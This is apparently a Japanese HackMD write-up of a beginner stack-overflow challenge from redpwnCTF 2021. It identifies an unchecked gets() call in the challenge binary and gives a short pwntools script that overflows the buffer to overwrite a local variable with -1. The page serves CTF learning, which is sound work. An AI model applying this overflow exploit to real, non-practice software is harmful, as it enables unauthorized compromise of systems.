###### tags: `redpwnCTF 2021` `Stack Overflow` # beginner generic pwn number 0 - redpwnCTF 2021 ![](https://img.shields.io/badge/Type-Stack%20Overflow-red) ### writeup #### debug ``` Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) ``` GDBで、main関数の中を覗くと ``` 0x00000000004012a0 <+170>: call 0x4010f0 <gets@plt> 0x00000000004012a5 <+175>: cmp QWORD PTR [rbp-0x8],0xffffffffffffffff ``` `gets`を使っているので、自明なBofです。 また、次の処理で`0xffffffffffffffff`(-1)と比較しています。 よって、Bufferを埋めた後、-1の値を送るexploitを書けばいいということになります。 ### solver ```python= from pwn import * io = process("./beginner-generic-pwn-number-0") #io = remote('mc.ax', 31077) payload = b"" payload += b"A"*32 + b"B"*8 payload += b"\xff"*8 io.sendlineafter(":(", payload) io.interactive() ```
Last changed by  
yu1hpa
175

Read more

pwn_monster1, 2, 3 - niticCTF

solverのソースコードは、GitHubにあります。 pwn_monster1 TL;DR ncしたら、nameに入力した文字が溢れそうなのでAを大量に入力する FLAG GET writeup ncした結果

4/26/2022
writeups - nitic CTF

CTF後記 最終順位が48位。 Pwnにもう少し難しい問題が来るかなと予想していて、Pwnだけでまぁまぁ点数が取れるんじゃないかと思っていたが、その予想を外した。 みんなが解ける問題(pwn_monster) or 解けない問題(baby_IO_jail) に二極分化されていて悲しい。もう少し...出してほしかった。 ただ、Pwnに関しては、毎回初心者向けCTFでも5割以下の正答率だったので初参加の人にとっては「調べれば解ける」問題だったので良かった。 CryptoやWebなどの他の分野に挑戦するいい機会になった。 それと同時に、CryptoやWebもしっかり学ばないと良い順位を取ることができないことも学んだ。

9/6/2021
ret2winrars - RARCTF 2021

writeup 問題名からreturn addressを書き換えると予想できる。 Let's debug!!! disass main gef➤ disass main Dump of assembler code for function main: 0x0000000000401191 <+0>: push rbp 0x0000000000401192 <+1>: mov rbp,rsp => 0x0000000000401195 <+4>: mov rax,QWORD PTR [rip+0x2eb4] # 0x404050 <stdout@@GLIBC_2.2.5>

8/18/2021
Archer - RaRCTF 2021

writeup main関数 undefined8 main(void) { int64_t iVar1; char *s1; puts("It\'s battle day archer! Have you got what it takes?"); printf("Answer [yes/no]: "); fflush(_reloc.stdout);

8/18/2021
Read more from yu1hpa
Published on HackMD